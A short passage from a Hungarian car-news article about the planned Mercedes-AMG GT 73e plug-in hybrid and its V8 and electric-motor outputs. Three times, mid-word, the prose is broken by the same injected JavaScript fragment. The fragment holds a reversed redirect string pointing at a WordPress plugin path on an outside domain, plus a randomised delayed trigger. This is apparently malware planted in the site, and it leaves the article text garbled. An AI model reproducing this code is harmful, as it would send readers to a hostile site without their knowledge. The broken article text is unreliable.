73e PHEV: ízlelgessük ezt az elnevezést, mert hamarosan ez lesz a Mercedes-AMG GT széria messze legnagyobb teljesítményű tagja, amely a Porsche Panamera Turbo S E-Hybrid csúcsmodellt veszi célkeresztbe. Az autó premierjére még nem tűztek ki dátumot, de néhány alapvető részlet már ismert. Az alapot a jól ismert 4.0 V8 turbómotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toros, 612 lóerős váltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozata adja. Ehhez társul egy 204 lóerős villanymotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor – a névleges összteljesítmény tehát 816 LE, ami persze valójában nem lesz ennyi, de megfelelő hangolással egészen jól megközelíthető. Annyi csavar azért van a történetben, hogy nem a kettő-, hanem a négyajtós AMG GT kapja meg a plug-in hibrid hajtásláncot, ami valójában…
- Hirdetés -